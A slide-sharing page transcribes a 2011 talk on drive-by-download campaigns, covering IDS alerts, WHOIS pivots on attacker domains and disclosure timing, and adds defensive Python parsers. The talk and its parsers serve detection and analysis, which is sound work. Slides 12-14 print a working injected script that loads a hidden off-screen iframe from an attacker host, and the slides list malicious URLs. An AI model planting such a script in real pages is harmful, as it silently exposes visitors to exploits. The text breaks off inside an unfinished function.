Advanced Test Driven-Development @ php[tek] 2024Advanced Test Driven-Development @ php[tek] 2024
Advanced Test Driven-Development @ php[tek] 2024Scott Keck-Warren
 
Nell’iperspazio con Rocket: il Framework Web di Rust!
Nell’iperspazio con Rocket: il Framework Web di Rust!Nell’iperspazio con Rocket: il Framework Web di Rust!
Nell’iperspazio con Rocket: il Framework Web di Rust!Commit University
 
Developer Data Modeling Mistakes: From Postgres to NoSQL
Developer Data Modeling Mistakes: From Postgres to NoSQLDeveloper Data Modeling Mistakes: From Postgres to NoSQL
Developer Data Modeling Mistakes: From Postgres to NoSQLScyllaDB
 

Último (20)

Commit 2024 - Secret Management made easy
Commit 2024 - Secret Management made easyCommit 2024 - Secret Management made easy
Commit 2024 - Secret Management made easy
 
Merck Moving Beyond Passwords: FIDO Paris Seminar.pptx
Merck Moving Beyond Passwords: FIDO Paris Seminar.pptxMerck Moving Beyond Passwords: FIDO Paris Seminar.pptx
Merck Moving Beyond Passwords: FIDO Paris Seminar.pptx
 
Leverage Zilliz Serverless - Up to 50X Saving for Your Vector Storage Cost
Leverage Zilliz Serverless - Up to 50X Saving for Your Vector Storage CostLeverage Zilliz Serverless - Up to 50X Saving for Your Vector Storage Cost
Leverage Zilliz Serverless - Up to 50X Saving for Your Vector Storage Cost
 
"Debugging python applications inside k8s environment", Andrii Soldatenko
"Debugging python applications inside k8s environment", Andrii Soldatenko"Debugging python applications inside k8s environment", Andrii Soldatenko
"Debugging python applications inside k8s environment", Andrii Soldatenko
 
New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024
New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024
New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024
 
Artificial intelligence in cctv survelliance.pptx
Artificial intelligence in cctv survelliance.pptxArtificial intelligence in cctv survelliance.pptx
Artificial intelligence in cctv survelliance.pptx
 
Tampa BSides - Chef's Tour of Microsoft Security Adoption Framework (SAF)
Tampa BSides - Chef's Tour of Microsoft Security Adoption Framework (SAF)Tampa BSides - Chef's Tour of Microsoft Security Adoption Framework (SAF)
Tampa BSides - Chef's Tour of Microsoft Security Adoption Framework (SAF)
 
TeamStation AI System Report LATAM IT Salaries 2024
TeamStation AI System Report LATAM IT Salaries 2024TeamStation AI System Report LATAM IT Salaries 2024
TeamStation AI System Report LATAM IT Salaries 2024
 
Hyperautomation and AI/ML: A Strategy for Digital Transformation Success.pdf
Hyperautomation and AI/ML: A Strategy for Digital Transformation Success.pdfHyperautomation and AI/ML: A Strategy for Digital Transformation Success.pdf
Hyperautomation and AI/ML: A Strategy for Digital Transformation Success.pdf
 
H2O.ai CEO/Founder: Sri Ambati Keynote at Wells Fargo Day
H2O.ai CEO/Founder: Sri Ambati Keynote at Wells Fargo DayH2O.ai CEO/Founder: Sri Ambati Keynote at Wells Fargo Day
H2O.ai CEO/Founder: Sri Ambati Keynote at Wells Fargo Day
 
Dev Dives: Streamline document processing with UiPath Studio Web
Dev Dives: Streamline document processing with UiPath Studio WebDev Dives: Streamline document processing with UiPath Studio Web
Dev Dives: Streamline document processing with UiPath Studio Web
 
What's New in Teams Calling, Meetings and Devices March 2024
What's New in Teams Calling, Meetings and Devices March 2024What's New in Teams Calling, Meetings and Devices March 2024
What's New in Teams Calling, Meetings and Devices March 2024
 
Vertex AI Gemini Prompt Engineering Tips
Vertex AI Gemini Prompt Engineering TipsVertex AI Gemini Prompt Engineering Tips
Vertex AI Gemini Prompt Engineering Tips
 
From Family Reminiscence to Scholarly Archive .
From Family Reminiscence to Scholarly Archive .From Family Reminiscence to Scholarly Archive .
From Family Reminiscence to Scholarly Archive .
 
Ensuring Technical Readiness For Copilot in Microsoft 365
Ensuring Technical Readiness For Copilot in Microsoft 365Ensuring Technical Readiness For Copilot in Microsoft 365
Ensuring Technical Readiness For Copilot in Microsoft 365
 
Take control of your SAP testing with UiPath Test Suite
Take control of your SAP testing with UiPath Test SuiteTake control of your SAP testing with UiPath Test Suite
Take control of your SAP testing with UiPath Test Suite
 
Anypoint Exchange: It’s Not Just a Repo!
Anypoint Exchange: It’s Not Just a Repo!Anypoint Exchange: It’s Not Just a Repo!
Anypoint Exchange: It’s Not Just a Repo!
 
Advanced Test Driven-Development @ php[tek] 2024
Advanced Test Driven-Development @ php[tek] 2024Advanced Test Driven-Development @ php[tek] 2024
Advanced Test Driven-Development @ php[tek] 2024
 
Nell’iperspazio con Rocket: il Framework Web di Rust!
Nell’iperspazio con Rocket: il Framework Web di Rust!Nell’iperspazio con Rocket: il Framework Web di Rust!
Nell’iperspazio con Rocket: il Framework Web di Rust!
 
Developer Data Modeling Mistakes: From Postgres to NoSQL
Developer Data Modeling Mistakes: From Postgres to NoSQLDeveloper Data Modeling Mistakes: From Postgres to NoSQL
Developer Data Modeling Mistakes: From Postgres to NoSQL
 

Drive-By Download Evolution and Detection After Vulnerability Disclosure

  • 1. Drive-By-Download Attack Evolution Before and After Vulnerability Disclosure Vladimir B. Kropotov TBINFORM (TNK-BP Group)
  • 2. Drive-By-Download • Hackers distribute malware by "poisoning" legitimate websites • Hacker injects malicious iframes into HTML content • Vulnerabilities in Browsers, Acrobat, Java, Flash Player, etc, used by attacker. You just want information about insurance, nothing more, but…
  • 3. What does it look like? (diagram) PC connected to the Internet -> Known server with iframe -> Intermediate server controlled by attacker -> Exploit server controlled by attacker (receives OS, browser plugins, etc. INFO; returns Exploit) -> Malware server controlled by attacker (Host ready -> Malware)
  • 4. How we find it? IDS alert:
      Date/Time            2011-08-05 10:44:53 YEKST
      Tag Name             PDF_XFA_Script
      Observance Type      Intrusion Detection
      Cleared Flag         false
      Target IP Address    10.X.X.X
      Target Object Name   9090
      Target Object Type   Target Port
      Target Service       unknown
      Source IP Address    10.X.X.Y
      SourcePort Name      2359
      :compressed          zlib
      :server              total.logeater.org
      :URL                 //images/np/45eebb038bd46a63e08665f3081fb408/6cd14aca59271182c8a04159f9ad2804.pdf
  • 5. How we find it? DOES USER NEED IT??
      Date/Time            2011-08-05 10:44:53
      Tag Name             PDF_XFA_Script
      Target IP Address    10.X.X.X
      Target Object Name   9090
      Target Object Type   Target Port
      Source IP Address    10.X.X.Y
      SourcePort Name      2359
      :compressed          zlib
      :server              total.logeater.org
      :URL                 //images/np/45eebb038bd46a63e08665f3081fb408/6cd14aca59271182c8a04159f9ad2804.pdf
  • 6. First indicators
      Date/Time    2011-07-26 11:24:37
      Tag Name     PDF_XFA_Script
      arg          3592ba48df0fae9e5f5c5b09535a070d0b04020600510f0c56075c06040750
      compressed   zlib
      server       mamjhvbw.dyndns.pro
      URL          /ghqlv3ym/
  • 7. First indicators
      Date/Time    2011-08-16 13:24:44
      Tag Name     ActiveX_Warning
      :clsid       CAFEEFAC-DEC7-0000-0000-ABCDEFFEDCBA
      server       skipetar.in
      URL          /jb/pda.js

      Date/Time    2011-08-18 19:00:13
      Tag Name     ActiveX_Warning
      clsid        CAFEEFAC-DEC7-0000-0000-ABCDEFFEDCBA
      server       e1in.in
      URL          /stat/574a353789f/pda.js
  • 8. First indicators
      Date/Time    2011-08-09 10:17:14
      Tag Name     PDF_XFA_Script
      arg          host=http://inaptly.in&b=486def4
      compressed   gzip
      server       inaptly.in
      URL          /jb/lastrger.php

      Date/Time    2011-08-14 14:06:28
      Tag Name     PDF_XFA_Script
      :arg         host=http://oligist.in&b=486def4
      :compressed  gzip
      :server      oligist.in
      :URL         /jb/lastrger.php

      Date/Time    2011-08-18 19:00:13
      Tag Name     PDF_XFA_Script
      arg          host=http://e1in.in/stat&u=root
      compressed   zlib
      server       e1in.in
      URL          /stat/574a353789f/lastrger.php
  • 9. First indicators (all six alerts from slides 6-8 side by side)
      2011-07-26 11:24:37  PDF_XFA_Script   mamjhvbw.dyndns.pro  /ghqlv3ym/                       arg 3592ba48df0fae9e5f5c5b09535a070d0b04020600510f0c56075c06040750, compressed zlib
      2011-08-09 10:17:14  PDF_XFA_Script   inaptly.in           /jb/lastrger.php                 arg host=http://inaptly.in&b=486def4, compressed gzip
      2011-08-14 14:06:28  PDF_XFA_Script   oligist.in           /jb/lastrger.php                 arg host=http://oligist.in&b=486def4, compressed gzip
      2011-08-16 13:24:44  ActiveX_Warning  skipetar.in          /jb/pda.js                       clsid CAFEEFAC-DEC7-0000-0000-ABCDEFFEDCBA
      2011-08-18 19:00:13  ActiveX_Warning  e1in.in              /stat/574a353789f/pda.js         clsid CAFEEFAC-DEC7-0000-0000-ABCDEFFEDCBA
      2011-08-18 19:00:13  PDF_XFA_Script   e1in.in              /stat/574a353789f/lastrger.php   arg host=http://e1in.in/stat&u=root, compressed zlib
  • 12. Example: o-strahovanie.ru, SEP 02. Script injected into the page:
      / ============ bbb ============
      document.xmlSettings.if_ik=false;
      if(window.localStorage){
        if(window.localStorage.if_ik){
          if(parseInt(window.localStorage.if_ik)+2592000 < document.xmlSettings.time()) document.xmlSettings.if_ik=true;
        }else document.xmlSettings.if_ik=true;
      }else{// 4 osel
        if(document.xmlSettings.getCookie('if_ik')){
          if(parseInt(document.xmlSettings.getCookie('if_ik'))+2592000 < document.xmlSettings.time()) document.xmlSettings.if_ik=true;
        }else document.xmlSettings.if_ik=true;
      }
      if(document.xmlSettings.if_ik){
        if(window.localStorage)window.localStorage.if_ik=document.xmlSettings.time();
        else document.xmlSettings.setCookie('if_ik',document.xmlSettings.time(),{ expires:(document.xmlSettings.time() + 86400*365) });
        document.xmlSettings.iframe=document.createElement('iframe');
        document.xmlSettings.iframe.style.cssText='height:1px;position:absolute;width:1px;border:none;left:-5000px;';
        document.body.appendChild(document.xmlSettings.iframe);
        document.xmlSettings.iframe.src='htt'+'p://'+'disreg'+'arding.i'+'n/xtqd2/08.p'+'hp';
      }
      Cookie left on the client: if_ik 1315314771 www.o-strahovanie.ru/ 1600429305625633310239293001403230174358*
  • 13. Example: o-strahovanie.ru. The branch that matters:
      / ============ bbb ============
      else{// 4 osel
        if(document.xmlSettings.getCookie('if_ik')){
          document.xmlSettings.iframe=document.createElement('iframe');
          document.xmlSettings.iframe.style.cssText='height:1px;position:absolute;width:1px;border:none;left:-5000px;';
          document.body.appendChild(document.xmlSettings.iframe);
          document.xmlSettings.iframe.src='htt'+'p://'+'disreg'+'arding.i'+'n/xtqd2/08.p'+'hp';
      }
      Cookie: if_ik 1315314771 www.o-strahovanie.ru/ 1600429305625633310239293001403230174358*
  • 14. Example: o-strahovanie.ru
      else{// 4 osel
        …
        document.body.appendChild(document.xmlSettings.iframe);
        document.xmlSettings.iframe.src='htt'+'p://'+'disreg'+'arding.i'+'n/xtqd2/08.p'+'hp';
      }
      The concatenated pieces decode to: iframe.src='http://disregarding.in/xtqd2/08.php'
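The injected script on slides 12-14 hides its landing URL by splitting it into concatenated string pieces, creates a 1px iframe pushed 5000px off-screen, and uses localStorage or a cookie (if_ik, compared against 2592000 seconds) so that each visitor is redirected at most once a month. The following scanner is an added example (written for this page, not code from the deck or from the injected script's author) that folds such concatenations back together, extracts iframe src URLs, flags the hiding CSS and reports the revisit throttle. The function names are this example's own; the sample input is the script shown on the slides.

```python
import re

# The injected script from slides 12-14 of the deck (the page's own sample),
# reproduced here as the test input for the scanner below.
INJECTED_JS = """
document.xmlSettings.if_ik=false;
if(window.localStorage){
  if(window.localStorage.if_ik){
    if(parseInt(window.localStorage.if_ik)+2592000 < document.xmlSettings.time()) document.xmlSettings.if_ik=true;
  }else document.xmlSettings.if_ik=true;
}else{// 4 osel
  if(document.xmlSettings.getCookie('if_ik')){
    if(parseInt(document.xmlSettings.getCookie('if_ik'))+2592000 < document.xmlSettings.time()) document.xmlSettings.if_ik=true;
  }else document.xmlSettings.if_ik=true;
}
if(document.xmlSettings.if_ik){
  if(window.localStorage)window.localStorage.if_ik=document.xmlSettings.time();
  else document.xmlSettings.setCookie('if_ik',document.xmlSettings.time(),{ expires:(document.xmlSettings.time() + 86400*365) });
  document.xmlSettings.iframe=document.createElement('iframe');
  document.xmlSettings.iframe.style.cssText='height:1px;position:absolute;width:1px;border:none;left:-5000px;';
  document.body.appendChild(document.xmlSettings.iframe);
  document.xmlSettings.iframe.src='htt'+'p://'+'disreg'+'arding.i'+'n/xtqd2/08.p'+'hp';
}
"""

# A chain of two or more single-quoted literals joined with '+', kept on one line
# so that a stray quote elsewhere in the script cannot glue unrelated text together.
CONCAT_RE = re.compile(r"'[^'\n]*'(?:\s*\+\s*'[^'\n]*')+")
LITERAL_RE = re.compile(r"'([^'\n]*)'")


def fold_concatenations(js):
    """Collapse 'htt'+'p://'+... chains into one literal so URL matching works."""
    return CONCAT_RE.sub(
        lambda m: "'" + "".join(LITERAL_RE.findall(m.group(0))) + "'", js)


def find_iframe_sources(js):
    """Every URL assigned to an iframe .src, after de-concatenation."""
    return re.findall(r"iframe\.src\s*=\s*'([^']*)'", fold_concatenations(js))


# CSS fragments that make an element invisible to the user while it still loads.
HIDDEN_CSS_HINTS = (
    re.compile(r"(?:width|height)\s*:\s*[01]px"),
    re.compile(r"left\s*:\s*-\d{3,}px"),            # pushed far off-screen
    re.compile(r"visibility\s*:\s*hidden|display\s*:\s*none"),
)


def hidden_iframe_styles(js):
    """cssText values that hide the element (1px box, off-screen, or display:none)."""
    return [css for css in re.findall(r"cssText\s*=\s*'([^']*)'", js)
            if any(p.search(css) for p in HIDDEN_CSS_HINTS)]


def revisit_throttle_days(js):
    """If the script compares a stored timestamp plus N seconds against 'now',
    return N in days; the sample uses 2592000 s, i.e. one redirect per 30 days."""
    m = re.search(r"parseInt\([^)]*\)\s*\+\s*(\d+)\s*<", js)
    return int(m.group(1)) // 86400 if m else None


def scan(js):
    """Summarise the indicators a page scanner would raise for this script."""
    return {
        "iframe_sources": find_iframe_sources(js),
        "hidden_styles": hidden_iframe_styles(js),
        "throttle_days": revisit_throttle_days(js),
    }


if __name__ == "__main__":
    for key, value in scan(INJECTED_JS).items():
        print(f"{key}: {value}")
```

Folding string concatenations before pattern matching is what defeats this particular trick; a scanner that greps raw page source for "disregarding.in" never sees it. The throttle is also why a one-off visit from an analyst machine can come back clean: the script only injects the iframe when the if_ik marker is absent or older than 30 days.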
  • 15. Drive By Download, o-strahovanie.ru, Sep 02 (diagram): PC connected to the Internet -> Known server with iframe -> Intermediate server disregarding.in -> Exploit server: NO exploit (OS, browser plugins, etc. INFO sent, nothing returned) -> Malware server: NO malware (Host ready, nothing delivered)
  • 16. Drive By Download, o-strahovanie.ru, Sep 12 (diagram): PC connected to the Internet -> Known server with iframe -> Intermediate server disregarding.in -> Exploit server chamberwoman.in / janiculum.in (OS, browser plugins, etc. INFO -> Exploit) -> Malware server chamberwoman.in / janiculum.in (Host ready -> Malware)
  • 17. Example: o-strahovanie.ru
      Domain Name:DISREGARDING.IN
      Created On:14-Jul-2011 11:09:59 UTC
      Registrant Name:Russell Rosario
      Registrant Street1:136 Oakdale Avenue
      City:Winter Haven
      Registrant Country:US
      Email:russellsrosario@teleworm.com
      Name Server:NS1.PRIDES.ME
      Name Server:NS2.PRIDES.ME

      Domain Name:JANICULUM.IN, CHAMBERWOMAN.IN
      Created On:12-Sep-2011 08:14 UTC
      Registrant Name:Russell Rosario
  • 18. Example: o-strahovanie.ru
      Domain Name:DISREGARDING.IN
      Created On:14-Jul-2011 11:09:59 UTC
      Domain Name:JANICULUM.IN, CHAMBERWOMAN.IN
      Created On:12-Sep-2011 08:14 UTC
      Registrant Name:Russell Rosario
      No Payload, because No Payload Requests? Are they looking for customers?
  • 19. Example: o-strahovanie.ru
      Domain ID:D5165642-AFIN
      Domain Name:DISREGARDING.IN
      Created On:14-Jul-2011 11:09:59 UTC
      Registrant Name: Russell Rosario
      Registrant Street1:136 Oakdale Avenue
      City:Winter Haven
      Registrant Country:US
      Email:russellsrosario@teleworm.com
      Name Server:NS1.PRIDES.ME
      Name Server:NS2.PRIDES.ME
  • 20. Russell Rosario
      Domain Name:FILTRATED.IN
      Created On:14-Jul-2011 11:09:53 UTC
      Sponsoring Registrar:Directi Web Services Pvt. Ltd. (R118-AFIN)
      Registrant ID:TS_16731618
      Registrant Name:Russell Rosario
      Registrant Street1:136 Oakdale Avenue
      Registrant City:Winter Haven
      Registrant State/Province:Florida
      Registrant Postal Code:33830
      Registrant Country:US
      Registrant Phone:+1.8635571308
      Email:russellsrosario@teleworm.com
      Registered within the same minute: filtrated.in (Created On:14-Jul-2011 11:09:56 UTC), raptnesses.in (Created On:14-Jul-2011 11:09:56 UTC), tansies.in (Created On:14-Jul-2011 11:10:03 UTC)
      But Sally Doesn't Know…
  • 21. Attack before public disclosure • Primary location for malicious sites: .IN • Physical servers location by IP-Address: Romania • Responsible person: Russell Rosario • Domains are new
  • 22. Domain owner is the same
      Domain Name      Created On                  Registrant Name
      irrefutably.in   15-Jul-2011 11:00:21 UTC    Russell Rosario
      comprador.in     25-Jul-2011 05:59:54 UTC    Russell Rosario
      hyalines.in      29-Jul-2011 09:39:33 UTC    Russell Rosario
      suffrago.in      01-Aug-2011 05:35:12 UTC    Russell Rosario
      ruritanian.in    01-Aug-2011 05:35:50 UTC    Russell Rosario
      20-Jul-2011: Acrobat Vulnerability, vendor notified
  • 23. Vulnerability reported to vendor
      VUPEN Security Research - Adobe Acrobat and Reader PCX Processing Heap Overflow Vulnerability
      VUPEN Security Research - Adobe Acrobat and Reader IFF Processing Heap Overflow Vulnerability
      VUPEN Security Research - Adobe Acrobat and Reader Picture Dimensions Heap Overflow Vulnerability
      VUPEN Security Research - Adobe Acrobat and Reader TIFF BitsPerSample Heap Overflow Vulnerability
      X. DISCLOSURE TIMELINE
      2011-07-20 - Vulnerability Discovered by VUPEN and shared with TPP customers
      2011-09-14 - Public disclosure

      ZDI-11-310 : Adobe Reader Compound Glyph Index Sign Extension Remote Code Execution Vulnerability
      Disclosure Timeline: 2011-07-20 - Vulnerability reported to vendor; 2011-10-26 - Coordinated public release of advisory

      ZDI-11-316 : Apple QuickTime H264 Matrix Conversion Remote Code Execution Vulnerability
      Disclosure Timeline: 2011-07-20 - Vulnerability reported to vendor; 2011-10-27 - Coordinated public release of advisory
  • 24. Harvesting machine started
      Domain Name        Created On                  Registrant Name
      microdrili.in      05-Aug-2011 07:13:08 UTC    Russell Rosario
      oligist.in         05-Aug-2011 07:13:12 UTC    Russell Rosario
      provost.in         05-Aug-2011 07:13:18 UTC    Russell Rosario
      vaginalitis.in     05-Aug-2011 07:13:25 UTC    Russell Rosario
      kremlinology.in    05-Aug-2011 07:13:35 UTC    Russell Rosario
      invariance.in      05-Aug-2011 07:13:41 UTC    Russell Rosario
      alleghenian.in     05-Aug-2011 07:13:48 UTC    Russell Rosario
      dandifies.in       05-Aug-2011 07:14:06 UTC    Russell Rosario
      xenophoby.in       05-Aug-2011 07:14:09 UTC    Russell Rosario
      alliaria.in        05-Aug-2011 07:14:15 UTC    Russell Rosario
      skipetar.in        05-Aug-2011 07:14:21 UTC    Russell Rosario
      inaptly.in         05-Aug-2011 07:15:05 UTC    Russell Rosario
      allhallowtide.in   05-Aug-2011 07:15:20 UTC    Russell Rosario
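Slides 21 and 24 make the point that the servers behind the first alerts were days old: oligist.in, skipetar.in and inaptly.in were all registered on 05-Aug-2011 within two minutes of each other, and the IDS saw them between 4 and 11 days later. The following is an added example (not from the deck) that turns that observation into a check: it parses the alert records from slides 6-9 and the "Created On" column from slide 24, takes the earliest alert per server, and reports the domain's age at first sighting. It assumes the alert clock is the sensor's local time, YEKST (UTC+6, as shown on slide 4), and that servers absent from the WHOIS table get no age rather than a guessed one; the function names are this example's own.

```python
import re
from datetime import datetime, timedelta

# IDS alerts from slides 6-9 of the deck (the page's own records), one field per
# line as on the slides, records separated by a blank line.
ALERTS = """\
Date/Time 2011-07-26 11:24:37
Tag Name PDF_XFA_Script
arg 3592ba48df0fae9e5f5c5b09535a070d0b04020600510f0c56075c06040750
compressed zlib
server mamjhvbw.dyndns.pro
URL /ghqlv3ym/

Date/Time 2011-08-09 10:17:14
Tag Name PDF_XFA_Script
arg host=http://inaptly.in&b=486def4
compressed gzip
server inaptly.in
URL /jb/lastrger.php

Date/Time 2011-08-14 14:06:28
Tag Name PDF_XFA_Script
:arg host=http://oligist.in&b=486def4
:compressed gzip
:server oligist.in
:URL /jb/lastrger.php

Date/Time 2011-08-16 13:24:44
Tag Name ActiveX_Warning
:clsid CAFEEFAC-DEC7-0000-0000-ABCDEFFEDCBA
server skipetar.in
URL /jb/pda.js

Date/Time 2011-08-18 19:00:13
Tag Name ActiveX_Warning
clsid CAFEEFAC-DEC7-0000-0000-ABCDEFFEDCBA
server e1in.in
URL /stat/574a353789f/pda.js

Date/Time 2011-08-18 19:00:13
Tag Name PDF_XFA_Script
arg host=http://e1in.in/stat&u=root
compressed zlib
server e1in.in
URL /stat/574a353789f/lastrger.php
"""

# "Created On" values from the WHOIS table on slide 24 (the page's own data),
# limited to the servers that also appear in the alerts above.
WHOIS_CREATED = """\
oligist.in    05-Aug-2011 07:13:12 UTC
skipetar.in   05-Aug-2011 07:14:21 UTC
inaptly.in    05-Aug-2011 07:15:05 UTC
"""

# Field lines may carry the sensor's leading ':' (":server", ":URL") or not.
FIELD_RE = re.compile(r"^:?(Date/Time|Tag Name|arg|clsid|compressed|server|URL)\s+(.*)$")


def parse_alerts(text):
    """Split the key/value dump into one dict per alert record."""
    records, current = [], {}
    for line in text.splitlines():
        if not line.strip():
            if current:
                records.append(current)
                current = {}
            continue
        m = FIELD_RE.match(line.strip())
        if m:
            current[m.group(1)] = m.group(2).strip()
    if current:
        records.append(current)
    return records


def parse_whois_created(text):
    """domain -> naive UTC datetime of registration."""
    created = {}
    for line in text.splitlines():
        if line.strip():
            domain, stamp = line.split(None, 1)
            created[domain] = datetime.strptime(stamp.strip(), "%d-%b-%Y %H:%M:%S UTC")
    return created


def first_seen_by_server(alerts, utc_offset_hours=6):
    """Earliest alert per server, shifted to UTC. Assumption: alert timestamps are
    sensor-local YEKST (UTC+6); adjust utc_offset_hours for another sensor."""
    seen = {}
    for a in alerts:
        ts = datetime.strptime(a["Date/Time"], "%Y-%m-%d %H:%M:%S") - timedelta(hours=utc_offset_hours)
        if a["server"] not in seen or ts < seen[a["server"]]:
            seen[a["server"]] = ts
    return seen


def domain_age_report(alert_text, whois_text, max_age_days=30, utc_offset_hours=6):
    """Per server: first alert (UTC), age in whole days at that moment, and whether
    it is younger than max_age_days. Servers without WHOIS data are reported with None."""
    created = parse_whois_created(whois_text)
    rows = []
    for server, ts in sorted(first_seen_by_server(parse_alerts(alert_text), utc_offset_hours).items()):
        age = (ts - created[server]).days if server in created else None
        rows.append({"server": server, "first_seen_utc": ts, "age_days": age,
                     "newly_registered": None if age is None else age <= max_age_days})
    return rows


if __name__ == "__main__":
    for row in domain_age_report(ALERTS, WHOIS_CREATED):
        print(row)
```

The 30-day threshold is a common choice for "newly registered" alerting, not a figure from the deck. Note that a dynamic-DNS host such as mamjhvbw.dyndns.pro has no registration date of its own, which is one reason the report leaves it at None rather than treating "unknown" as "old".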
  • 25. But may be someone knows? • Spamlists • AV Vendors • Safebrowsing • Securityfocus
  • 29. Securityfocus, Sep 07
      Sent: Wednesday, September 07, 2011 11:31 PM
      Subject: There is a strange get request header in all web pages of my site? I'm worried about Trojan attack!
      Today I found that Kasper Anti Virus has blocked my site and says to the clients that this site is affected by a Trojan. I traced my site with Fiddler debugging tool and I found that every time I send a request to the site a GET request handler is established to the following URL: "http://carlos.c0m.li/iframe.php?id=v4pfa24nw91yhoszkdmoh413ywv6cp7"
  • 30. PDF vulnerabilities public disclosure Sep 14. What to expect?
  • 31. PDF vulnerabilities public disclosure Sep 14. What to expect? NO GOOD NEWS, JUST EPIC FAIL for site administrators
  • 32. No good news. Hundreds of domains were registered: ITALIA-NEW.IN, BANER-KLERK.RU, BANK-KLERK.RU, BANNER-KLERK.RU, BLOGS-KLERK.RU, BUH-KLERK.RU, DAILY-KP.RU, FORUM-KLERK.RU, I-OBOZREVATEL.RU, INTERFAX-REGION.RU, JOB-KLERK.RU, KLERK-BANK.RU, KLERK-BANKIR.RU, KLERK-BIZ.RU, KLERK-BOSS.RU, KLERK-BUH.RU, KLERK-EVEN.RU, KLERK-EVENTS.RU, KLERK-LAW.RU, KLERK-NEW.RU, KLERK-NEWS.RU, KLERK-REKLAMA.RU, KLERK-RU.RU, KLERK-WORK.RU, KLERK2.RU, OBOZREVATEL-RU.RU, OBOZREVATELRU.RU, WIKI-KLERK.RU, PRESS-RZD.RU, RZD-RZD.RU, IPGEOBASE.IN, ***
  • 33. "New generation" (diagram): PC connected to the Internet -> Known server with iframe -> Other known server NOT controlled by attacker -> Intermediate server controlled by attacker -> Exploit server controlled by attacker (OS, browser plugins, etc. INFO -> Exploit) -> Malware server controlled by attacker (Host ready -> Malware)
  • 34. Attack after public disclosure • Primary location for malicious sites: .IN, .RU, .CX.CC, .BIZ, .INFO,… • Physical servers location by IP-Address: International • Domains registered to different spurious persons • Domain lifetime ~ time to Blacklists appearance • Attack refers to malicious server for a short period of time, and to well known one almost all day long (Blacklist evasion technique) • If you don't know exact malware URL, site redirects to well known server • Different types of payload used: password stealers, win lockers, and even “normal” (or another ZD) files installed
  • 35. Known sites examples: RZD.RU Russian rail roads
  • 37. Just TWO Domains, SURE?
      Domain                  URL
      interfax-rzd.in         http://interfax-rzd.in/news/buble.php?key=rtgddfg%26u=root
      rzd-interfax-online.in  http://rzd-interfax-online.in/rzd-news/buble.php?key=rtgddfg%26u=root
      news-rzdstyle.in        http://news-rzdstyle.in/new-mail/buble.php?key=rtgddfg%26u=root
      rzd-rzd.in              http://rzd-rzd.in/rzd5/buble.php?key=rtgddfg%26u=root
      therzd-rzd.in           http://therzd-rzd.in/rzd5/buble.php?key=rtgddfg%26u=root
      rzd-rzdcomp.in          http://rzd-rzdcomp.in/rzd5/buble.php?key=rtgddfg%26u=root
      rzd-rzdcomp.in          http://rzd-rzdcomp.in/rzd5/exe.php?exp=newjava%26key=rtgddfg%26u=root
      rzd-rzdcomp.in          http://rzd-rzdcomp.in/rzd5/exe.php?exp=newjava%26key=rtgddfg%26u=root;1
      press-rzd.in            http://press-rzd.in/rzd/buble.php?key=rtgddfg%26u=root
      rzd-press.in            http://rzd-press.in/rzd/buble.php?key=rtgddfg%26u=root
      rzd-banner.in           http://rzd-banner.in/rzd/buble.php?key=rtgddfg%26u=root
      pass-rzd.in             http://pass-rzd.in/rzd/buble.php?key=rtgddfg%26u=root
      rzd-ticket.in           http://rzd-ticket.in/zd/buble.php?key=rtgddfg%26u=root
  • 38. Known sites examples: RZD.RU Russian rail roads
  • 40. Known sites examples: KP.RU (Komsomolskaya Pravda, newspaper)
  • 42. Other examples: EG.RU (newspaper, 263 685 visits per day)
  • 43. Other examples: svpressa.ru (newspaper 276 720 visits per day)
  • 44. URA.RU (news 22 486 visits per day)
  • 45. URA.RU (news 22 486 visits per day)
  • 46. URA.RU (news 22 486 visits per day)
  • 47. Other examples: ria.ru (news, 667 222 visits per day)
      Datetime   [09/Nov/2011:12:26:45 +0300]
      Url        GET http://jya56yhsvcsss.com/BVRQ HTTP/1.0
      IP         176.9.50.178
      Site       jya56yhsvcsss.com
      Referrer   http://ria.ru/
  • 48. Other examples: inosmi.ru (news, 175 361 visits per day)
      Datetime   [09/Nov/2011:12:28:10 +0300]
      Url        GET http://jya56yhsvcsss.com/BVRQ HTTP/1.1
      IP         176.9.50.178
      Site       jya56yhsvcsss.com
      Referrer   http://inosmi.ru/
  • 49. Other examples: glavbukh.ru (15 200 visits per day)
      Datetime   [09/Nov/2011:12:14:46 +0300]
      Url        GET http://jya56yhsvcsss.com/BVRQ HTTP/1.0
      IP         176.9.50.178
      Site       jya56yhsvcsss.com
      Referrer   http://www.glavbukh.ru/
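Slides 47-49 show the same pivot three times: three unrelated, high-traffic news sites all send their visitors to one opaque host (jya56yhsvcsss.com, 176.9.50.178, path /BVRQ) within fourteen minutes. Grouping proxy or web-log records by destination rather than by source is what surfaces that pattern. The following is an added example (not code from the deck) that parses records in the slides' own layout, groups them by Site, lists the referring hosts, IPs and paths, measures the time span, and flags destinations that several distinct referrers funnel into within a short window. The thresholds (2 referrers, 3600 seconds) and the function names are this example's own choices.

```python
import re
from collections import defaultdict
from datetime import datetime

# Web-log records from slides 47-49 of the deck (the page's own data), one record
# per line in the slides' "Datetime ... Url ... IP ... Site ... Referrer ..." form.
LOG_RECORDS = """\
Datetime [09/Nov/2011:12:26:45 +0300] Url GET http://jya56yhsvcsss.com/BVRQ HTTP/1.0 IP 176.9.50.178 Site jya56yhsvcsss.com Referrer http://ria.ru/
Datetime [09/Nov/2011:12:28:10 +0300] Url GET http://jya56yhsvcsss.com/BVRQ HTTP/1.1 IP 176.9.50.178 Site jya56yhsvcsss.com Referrer http://inosmi.ru/
Datetime [09/Nov/2011:12:14:46 +0300] Url GET http://jya56yhsvcsss.com/BVRQ HTTP/1.0 IP 176.9.50.178 Site jya56yhsvcsss.com Referrer http://www.glavbukh.ru/
"""

RECORD_RE = re.compile(
    r"Datetime \[(?P<ts>[^\]]+)\] Url (?P<method>\S+) (?P<url>\S+) (?P<proto>\S+) "
    r"IP (?P<ip>\S+) Site (?P<site>\S+) Referrer (?P<ref>\S+)"
)


def parse_records(text):
    """One dict per log line; the timestamp becomes a timezone-aware datetime."""
    out = []
    for line in text.splitlines():
        m = RECORD_RE.match(line.strip())
        if m:
            rec = m.groupdict()
            rec["ts"] = datetime.strptime(rec["ts"], "%d/%b/%Y:%H:%M:%S %z")
            out.append(rec)
    return out


def host_of(url):
    """Scheme-less host part of a URL ('http://www.glavbukh.ru/' -> 'www.glavbukh.ru')."""
    return re.sub(r"^https?://", "", url).split("/")[0]


def path_of(url):
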